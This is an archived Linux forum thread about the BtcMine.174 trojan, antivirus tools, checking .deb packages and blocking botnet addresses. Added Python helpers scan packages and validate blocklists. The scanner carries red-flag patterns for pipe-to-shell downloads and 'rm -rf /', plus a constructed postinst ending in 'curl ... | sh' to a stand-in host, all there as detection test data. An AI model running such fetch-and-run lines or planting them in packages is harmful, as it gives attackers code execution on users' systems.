This is a static archive of the old Zorin Forum.


New Linux Malware on the Block!

Swarfendor437

Tue Nov 27, 2018 8:23:19 pm

https://www.theinquirer.net/inquirer/ne ... -standards

This is a new malware on the block - I was only made aware of it by visiting Spatry's Cup of Linux website. What is interesting is that this malware also contains a rootkit, so it will be interesting to see how rkhunter, chkrootkit, LMD and ClamAV respond to this threat. Having read the article, clamd is affected, which is the daemon that runs in conjunction with ClamAV. A forum member on CupOfLinux has suggested Sophos for Linux is one of the few AVs not affected. Spatry states that BitDefender for Linux is the better solution as it is free; you just have to provide an email address and renew each year. It's a cryptocurrency hunter hunting monoware. Lynis, from the writer of rkhunter, might also be worth considering. Unlike rkhunter, Lynis looks at weaknesses in a system and suggests hardening areas where there are potential weaknesses. Take care out there!

lat002

Wed Dec 19, 2018 8:52:48 pm

Swarfendor437,
This malware is a worry to me, still being a raw newbie on Zorin. Many things that I read about on the forums demonstrate the vast knowledge that is out there in the Linux community, which can seem daunting. I am more comfortable with Windows, where I rely on real-time anti-virus (etc.) protection (with annual subscription) to keep me safe.
I have just Googled "linux real time av protection" and got this hit: https://forums.fedoraforum.org/showthre ... ic-update-!
This discusses 'LINUX MALWARE DETECT', which looks like a promising defence against 'Linux.BtcMine.174', providing it is updated to detect that malware and is available on Zorin. I would much appreciate your expert comments please.

zorinantwerp

Wed Dec 19, 2018 9:34:24 pm

Hi,
Useful comments, if it fits your user profile:
Code:
https://www.reddit.com/r/linux/comments/a0kuqx/the_linuxbtcmine174_trojan_anyone_know_its_attack/


+++

Swarfendor437

Wed Dec 19, 2018 11:40:48 pm

In the scale of things, this is more worrying:

https://www.washingtonpost.com/business ... 2a96d98332

Also, just like most road traffic accidents happen as a result of the "...nut behind the wheel", most hacks take place due to the "...fingers on the keyboard and eyes not observing what is happening when browsing":

https://www.thesslstore.com/blog/5-ways ... or-a-scam/

Also check any third-party app you download that might be tarballed:

"Inspect 3rd-party .deb packages before installing: these should always be inspected before 'extracting' as, whilst not a virus, malicious code could be lurking there:
"I always open the debs and check for suspicious post-install scripts.
This is how to do that. ...

Listing the files from a Debian package using dpkg -c
dpkg is the package manager for Debian, so using the dpkg command you can list and extract packages, as shown below.
To view the content of a *.deb file:
Code:
$ dpkg -c ovpc_1.06.94-3_i386.deb
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/lib/
dr-xr-xr-x root/root 0 2010-02-25 10:48 ./ovpc/pkg/lib/header/
-r-xr-xr-x root/root 130 2009-10-29 17:06 ./ovpc/pkg/lib/header/libov.so
.
.
.
-r-xr-xr-x root/root 131 2009-10-29 17:06 ./ovpc/pkg/etc/conf
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/etc/conf/log.conf

Extracting the files from a Debian package using dpkg -x
Use dpkg -x to extract the files from a deb package into a directory, as shown below.
Code:
$ dpkg -x ovpc_1.06.94-3_i386.deb /tmp/ov
$ ls /tmp/ov
ovpc

DEB files are ar archives, which always contain the three files — debian-binary, control.tar.gz, and data.tar.gz. We can use the ar command and the tar command to extract and view the files from the deb package, as shown below.
First, extract the content of the *.deb archive file using the ar command.
Code:
$ ar -vx ovpc_1.06.94-3_i386.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
$

Next, extract the content of data.tar.gz as shown below.
Code:
$ tar -xvzf data.tar.gz
./
./ovpc/
./ovpc/pkg/
./ovpc/pkg/lib/
./ovpc/pkg/lib/header/
./ovpc/pkg/lib/header/libov.so
.
.
./ovpc/pkg/etc/conf
./ovpc/pkg/etc/conf/log.conf"

[With acknowledgement to Blackwolf on ultimateeditionoz.com forum – sadly the forum is no more]. There was an instance of a GNU/Linux theme uploaded to gnome-look.org called Ubundows that had not been checked by Admin for that site; the file, once extracted, executed 'Unix' commands to wipe the hard drive clean of all content - YOU HAVE BEEN WARNED!"
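
The commands quoted above list and unpack the payload, but the "suspicious post-install scripts" the quote says to check live in control.tar.*, which neither dpkg -x nor the tar step ever opens; a setuid binary in the payload is likewise invisible in a bare file listing. Below is an added example (not from the original post or from Blackwolf): a small Python inspector that parses the ar container itself (so it needs neither dpkg-deb nor binutils), pulls preinst/postinst/prerm/postrm out of the control tarball, greps them for a short list of red-flag patterns, and flags setuid/setgid files and unsafe paths in data.tar.*. It also accepts the data.tar.xz that current packages ship instead of .gz, and refuses data.tar.zst with a clear message. The package name, file list, postinst text and the 203.0.113.5 URL are constructed for the demo, and the pattern list is a starting point, not a complete signature set.

```python
"""Offline .deb inspector: list the payload, pull the maintainer scripts out of
control.tar.* (where postinst actually lives) and flag what a reviewer looks for.
Added example for this thread; not code from the original post."""
import io
import re
import stat
import sys
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Patterns that rarely belong in a legitimate maintainer script (starting list only).
SUSPICIOUS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba)?sh\b"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "rm-rf-root": re.compile(r"\brm\s+-[a-zA-Z]*[rR][a-zA-Z]*\s+/(\s|\*|$)", re.M),
    "eval": re.compile(r"\beval\b"),
    "persistence": re.compile(r"/etc/(cron\.|rc\.local|systemd/system/)"),
}


def ar_members(blob):
    """Parse the 'ar' container a .deb is: 8-byte magic, then 60-byte headers.
    Accepts dpkg-deb's space-padded names and GNU ar's trailing-slash names."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive, so not a .deb")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError(f"corrupt ar header at offset {pos}")
        name = hdr[0:16].decode("ascii", "replace").rstrip(" /")
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)  # members are padded to an even offset
    return members


def _open_tar(members, prefix):
    """Open control.tar.* or data.tar.*; tarfile handles gz/bz2/xz/plain, while
    data.tar.zst (dpkg's default since 1.21) needs an external decompressor."""
    name = next((n for n in members if n.startswith(prefix)), None)
    if name is None or name.endswith(".zst"):
        raise ValueError(f"{prefix}* missing or zstd-compressed (run unzstd first)")
    return tarfile.open(fileobj=io.BytesIO(members[name]), mode="r:*")


def inspect_deb(blob):
    """Return {'files', 'setuid', 'scripts', 'findings'}; each finding is
    (script-or-path, line-number, pattern-name)."""
    members = ar_members(blob)
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("missing or unexpected debian-binary version")
    report = {"files": [], "setuid": [], "scripts": {}, "findings": []}
    with _open_tar(members, "control.tar") as ctrl:
        for m in ctrl.getmembers():
            base = m.name.rsplit("/", 1)[-1]
            if m.isfile() and base in MAINT_SCRIPTS:
                text = ctrl.extractfile(m).read().decode("utf-8", "replace")
                report["scripts"][base] = text
                for label, rx in SUSPICIOUS.items():
                    for hit in rx.finditer(text):
                        line = text.count("\n", 0, hit.start()) + 1
                        report["findings"].append((base, line, label))
    with _open_tar(members, "data.tar") as data:
        for m in data.getmembers():
            report["files"].append(m.name)
            if m.name.startswith("/") or ".." in m.name.split("/"):
                report["findings"].append((m.name, 0, "unsafe-path"))
            if m.isfile() and m.mode & (stat.S_ISUID | stat.S_ISGID):
                report["setuid"].append(m.name)
    return report


def _tar_bytes(entries):
    """Build a gzipped tar in memory from (name, bytes, mode) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content, mode in entries:
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(content), mode
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def _ar_bytes(members):
    """Build the ar container the way dpkg-deb does (space-padded names)."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def build_sample_deb():
    """Constructed package (not a real one): payload names mirror the listing in
    the post, but postinst ends in a pipe-to-shell download and the payload has a
    setuid helper. Neither shows up in the 'dpkg -c' or 'tar -x' output."""
    postinst = (b"#!/bin/sh\nset -e\n# ordinary-looking post-install work ...\n"
                b"update-rc.d ovpc defaults\n# ... until it is not:\n"
                b"curl -s http://203.0.113.5/x.sh | sh\nexit 0\n")
    control = b"Package: ovpc\nVersion: 1.06.94-3\nArchitecture: i386\nDescription: sample\n"
    ctrl = _tar_bytes([("./control", control, 0o644), ("./postinst", postinst, 0o755)])
    data = _tar_bytes([("./ovpc/pkg/lib/header/libov.so", b"\x7fELF...", 0o555),
                       ("./ovpc/pkg/bin/helper", b"#!/bin/sh\n", 0o4755)])
    return _ar_bytes([("debian-binary", b"2.0\n"), ("control.tar.gz", ctrl),
                      ("data.tar.gz", data)])


if __name__ == "__main__":  # inspect a real .deb given on the command line, else the sample
    rep = inspect_deb(open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_deb())
    print("setuid/setgid:", rep["setuid"])
    for where, line, label in rep["findings"]:
        print(f"SUSPICIOUS {label} in {where}:{line}")
```

Run it with a downloaded .deb as the argument; with no argument it inspects the constructed sample and reports the postinst download and the setuid helper. Once you have the ar members on disk as in the steps above, the command-line equivalent of the control half is `dpkg-deb -e pkg.deb DEBIAN` followed by reading DEBIAN/postinst yourself; the point of the script is that the grep and the mode check are the part people skip.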

terry

Thu Dec 27, 2018 6:25:37 pm

1,000 lines of code; that's pretty long. It will really do some damage / cause headaches for a SysAd. Thanks for the post; I'll keep an eye on this and hope this can be fixed soon.

poojagite

Fri Feb 08, 2019 8:51:05 am

1 botnet used IP address ONLY (unusual as ICANN sinkholes those fast & I've seen an 'uptick' in it lately - perhaps hosts IS making a 'dent' in 'badguys': For that - you need a firewall block rule OR wait out ICANN).

No, you can easily block individual addresses through the routing table:
Code:
ip route add prohibit N.N.N.N

This works with networks too, like:
Code:
ip route add prohibit 185.224.136.0/23

If you have all of the nasties in a file, you can do something like this at startup, in an rc.local file or similar:
Code:
xargs -r -n1 </etc/ipblocklist ip route add prohibit

Also, while I have you here, many modern distros default to prefer DNS over /etc/hosts and only use /etc/hosts as a fallback, in which case your /etc/hosts list will not have any effect unless /etc/nsswitch.conf is modified.

Example line in /etc/nsswitch.conf that will not work:
Code:
hosts: dns [!UNAVAIL=return] files

Example line in /etc/nsswitch.conf that will work:
Code:
hosts: files dns

It's a hardware error.
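
Both halves of the post above are easy to get subtly wrong: a bare xargs over the blocklist hands comments, blank lines and typos straight to ip(8), and one stray private range in the file would prohibit the host's own LAN; on the nsswitch side, a hosts: line is only right once you ignore the bracketed action specs and check that files precedes dns. What follows is an added example, not from the original post: Python helpers that validate each blocklist entry with the standard ipaddress module and emit the exact `ip route add prohibit` commands (refusing non-global ranges), plus a parser for the hosts: line. The blocklist text and the single host 185.224.136.10 are constructed for the demo; the /23 is the range from the post.

```python
"""Helpers for blocklist-by-route and the nsswitch.conf hosts order.
Added example for this thread; not code from the original post."""
import ipaddress
import re


def prohibit_commands(blocklist_text):
    """Return (commands, rejected) for a blocklist file's contents.
    Blank lines and '#' comments are skipped. Entries that are not an address or
    CIDR, or that are not globally routable (own LAN, loopback, link-local,
    documentation ranges), are rejected rather than turned into a route that
    would cut the host off from itself. A bare host becomes a /32 (or /128)."""
    commands, rejected = [], []
    for raw in blocklist_text.splitlines():
        entry = raw.split("#", 1)[0].strip()
        if not entry:
            continue
        try:
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            rejected.append(entry)
            continue
        if not net.is_global:
            rejected.append(entry)
            continue
        family = "-6 " if net.version == 6 else ""
        commands.append(f"ip {family}route add prohibit {net.with_prefixlen}")
    return commands, rejected


def hosts_lookup_order(nsswitch_text):
    """Return (files_before_dns, sources) for the 'hosts:' line of nsswitch.conf.
    Action specs such as '[!UNAVAIL=return]' belong to the source before them and
    are stripped before comparing, so 'dns [!UNAVAIL=return] files' is reported
    as wrong and 'files mdns4_minimal [NOTFOUND=return] dns' as right."""
    for raw in nsswitch_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("hosts:"):
            continue
        sources = re.sub(r"\[[^\]]*\]", " ", line[len("hosts:"):]).split()
        if "files" not in sources or "dns" not in sources:
            return "files" in sources, sources
        return sources.index("files") < sources.index("dns"), sources
    return False, []  # no hosts: line found; treat as unverified


if __name__ == "__main__":
    # Constructed sample input; on a real box read /etc/ipblocklist and /etc/nsswitch.conf.
    sample = "# constructed blocklist\n185.224.136.10\n185.224.136.0/23\n\n10.0.0.0/8\nnot-an-ip\n"
    cmds, bad = prohibit_commands(sample)
    print("\n".join(cmds))
    print("rejected:", bad)
    for line in ("hosts: dns [!UNAVAIL=return] files", "hosts: files dns"):
        print(line, "->", "ok" if hosts_lookup_order(line)[0] else "hosts file ignored")
```

Pipe the printed commands into sh from rc.local or a systemd unit and they are re-applied at every boot, which the post's xargs line also relies on, since routes do not persist across reboots. Two caveats worth keeping in mind: a prohibit route is consulted when the kernel routes a packet to that destination (connect() fails with EACCES), so it stops the host and anything it forwards from reaching the address, but it is not an inbound firewall rule; and the nsswitch order only matters for lookups that go through glibc, not for software that does its own DNS.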